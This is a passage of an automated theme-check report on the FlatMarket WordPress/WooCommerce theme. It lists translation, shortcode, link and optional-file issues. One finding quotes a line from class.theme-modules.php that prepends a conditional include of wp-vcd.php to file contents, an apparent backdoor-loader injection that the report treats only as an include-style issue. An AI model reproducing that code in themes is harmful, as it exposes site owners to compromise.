in file woo-top-rated-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Title" in file woo-top-rated-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Products Per Page" in file woo-top-rated-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order By" in file woo-top-rated-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order" in file woo-top-rated-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Featured Products" in file woo-featured-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Products' in file woo-featured-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Display WooCommerce products" in file woo-featured-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Title" in file woo-featured-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Number of Products" in file woo-featured-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order By" in file woo-featured-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order" in file woo-featured-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Products" in file woo-products-by-ids-skus.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Products' in file woo-products-by-ids-skus.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Display WooCommerce products" in file woo-products-by-ids-skus.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Title" in file woo-products-by-ids-skus.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Products" in file woo-products-by-ids-skus.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order By" in file woo-products-by-ids-skus.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order" in file woo-products-by-ids-skus.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Sale Products" in file woo-sale-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Products' in file woo-sale-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Display WooCommerce products" in file woo-sale-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Title" in file woo-sale-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Number of Products" in file woo-sale-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order By" in file woo-sale-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order" in file woo-sale-products.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'This theme requires the following plugin: %1$s.', 'This theme requires the following plugins: %1$s.' in file theme-functions.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'This theme recommends the following plugin: %1$s.', 'This theme recommends the following plugins: %1$s.' in file theme-functions.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to install the %s plugin. Contact the administrator of this site for help on getting the plugin installed.', 'Sorry, but you do not have the correct permissions to install the %s plugins. Contact the administrator of this site for help on getting the plugins installed.' in file theme-functions.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following required plugin is currently inactive: %1$s.', 'The following required plugins are currently inactive: %1$s.' in file theme-functions.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following recommended plugin is currently inactive: %1$s.', 'The following recommended plugins are currently inactive: %1$s.' in file theme-functions.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to activate the %s plugin. Contact the administrator of this site for help on getting the plugin activated.', 'Sorry, but you do not have the correct permissions to activate the %s plugins. Contact the administrator of this site for help on getting the plugins activated.' in file theme-functions.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following plugin needs to be updated to its latest version to ensure maximum compatibility with this theme: %1$s.', 'The following plugins need to be updated to their latest version to ensure maximum compatibility with this theme: %1$s.' in file theme-functions.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to update the %s plugin. Contact the administrator of this site for help on getting the plugin updated.', 'Sorry, but you do not have the correct permissions to update the %s plugins. Contact the administrator of this site for help on getting the plugins updated.' in file theme-functions.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Begin installing plugin', 'Begin installing plugins' in file theme-functions.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Activate installed plugin', 'Activate installed plugins' in file theme-functions.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Posted on <a href="', title=%2$s rel=bookmark><time class=entry-date datetime=%3$s>%4$s</time></a><span class=byline> by <span class=author vcard><a class=url fn n href=%5$s title=%6$s rel=author>%7$s</a></span></span>, 'flatmarket' in file theme-tags.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Can't connect to %s" in file installer.class.php.Found a translation function that is missing a text-domain. Function esc_attr__, with the arguments 'Search' in file product-searchform.php.Found a translation function that is missing a text-domain. Function _nx, with the arguments '1 comment', '%1$s comments', 'flatmarket' in file comments.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are flatmarket, woocommerce, tgmpa, Y, m, j, title=%2$s rel=bookmark><time class=entry-date datetime=%3$s>%4$s</time></a><span class=byline> by <span class=author vcard><a class=url fn n href=%5$s title=%6$s rel=author>%7$s</a></span></span>, installer, sitepress.
  5. Plugin territory : Plugin territory functionalitiesThe theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  6. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  7. I18N implementation : Proper use of _e(Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables.
  8. I18N implementation : Proper use of ___all(Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. 2301: $inputs .= empty($options['field_options']['each_title']) ? '<h2 class='ipanel-repeater-title'>' . __('Item', $this->text_domain) . '<span class='item_number'> ' . ($i + 1) .Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. 2301: $inputs .= empty($options['field_options']['each_title']) ? '<h2 class='ipanel-repeater-title'>' . __('Item', $this->text_domain) . '<span class='item_number'> ' . ($i + 1) .Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. 2301: $inputs .= empty($options['field_options']['each_title']) ? '<h2 class='ipanel-repeater-title'>' . __('Item', $this->text_domain) . '<span class='item_number'> ' . ($i + 1) .Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in ipanel.class.php. Translation function calls should not contain PHP variables.
  9. CSS files : Presence of text domainText Domain: is missing from your style.css header.
  10. CSS files : Presence of .screen-reader-text class.screen-reader-text css class is needed in your theme css. See : the Codex for an example implementation.
  11. Screenshot : Screenshot fileScreenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon managementPossible Favicon found in theme-functions.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file ipanel.class.php.1287: $config['box_description'] = '<div class='ipanel-info alert'>FlatMarket theme is fully compatible with WPML ­the WordPress Multilingual plugin and even <a href='http://marketblog.envato.com/envatos-most-wanted/winners-wpml-woocommerce-w2582: $config['box_description'] = '<div class='ipanel-info alert'>FlatMarket theme is fully compatible with WPML ­the WordPress Multilingual plugin and even <a href='http://marketblog.envato.com/envatos-most-wanted/winners-wpml-woocommerce-w1346: <div class='theme-copyright'>Theme developed by <a href='http://magniumthemes.com/?from=mswp_cp_copy' target='_blank'>Magnium Themes1287: $config['box_description'] = '<div class='ipanel-info alert'>FlatMarket theme is fully compatible with WPML ­the WordPress Multilingual plugin and even <a href='http://marketblog.envato.com/envatos-most-wanted/winners-wpml-woocommerce-w2582: $config['box_description'] = '<div class='ipanel-info alert'>FlatMarket theme is fully compatible with WPML ­the WordPress Multilingual plugin and even <a href='http://marketblog.envato.com/envatos-most-wanted/winners-wpml-woocommerce-wPossible hard-coded links were found in the file products-compact.php.70: <a class='enter_site_key_js button-secondary' style='margin-top:-5px;' href='#'><?php _e('Enter site key', 'installer') ?></a> (You can get your site key in <a href='https://wpml.org/account/sites/' target='_blank'>WPML Account > Sites</a>).
  3. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  4. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  5. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  6. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  7. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  8. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  9. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  10. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  11. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  12. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  13. Use of includes : Use of include or requireThe theme appears to use include or require : class.theme-modules.php 48: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : theme-functions.php 6: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );8: require_once ('class-tgm-plugin-activation.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : theme-shortcodes.php 13: include_once('shortcodes/visual-composer/woo-recent-products.php');14: include_once('shortcodes/visual-composer/woo-featured-products.php');15: include_once('shortcodes/visual-composer/woo-products-by-category.php');16: include_once('shortcodes/visual-composer/woo-products-by-attribute.php');17: include_once('shortcodes/visual-composer/woo-product-by-id-sku.php');18: include_once('shortcodes/visual-composer/woo-products-by-ids-skus.php');19: include_once('shortcodes/visual-composer/woo-sale-products.php');20: include_once('shortcodes/visual-composer/woo-top-rated-products.php');21: include_once('shortcodes/visual-composer/woo-best-selling-products.php');22: include_once('shortcodes/visual-composer/woo-product-categories.php');25: include_once('shortcodes/visual-composer/mmm-menu.php');29: include_once('shortcodes/wp/recent-products-wp.php');30: include_once('shortcodes/wp/featured-products-wp.php');31: include_once('shortcodes/wp/sale-products-wp.php');32: include_once('shortcodes/wp/best-selling-products-wp.php');33: include_once('shortcodes/wp/products-by-category-wp.php');34: include_once('shortcodes/wp/products-wp.php');35: include_once('shortcodes/wp/products-by-attribute-wp.php');36: include_once('shortcodes/wp/top-rated-products-wp.php');37: include_once('shortcodes/wp/mmm-menu-wp.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes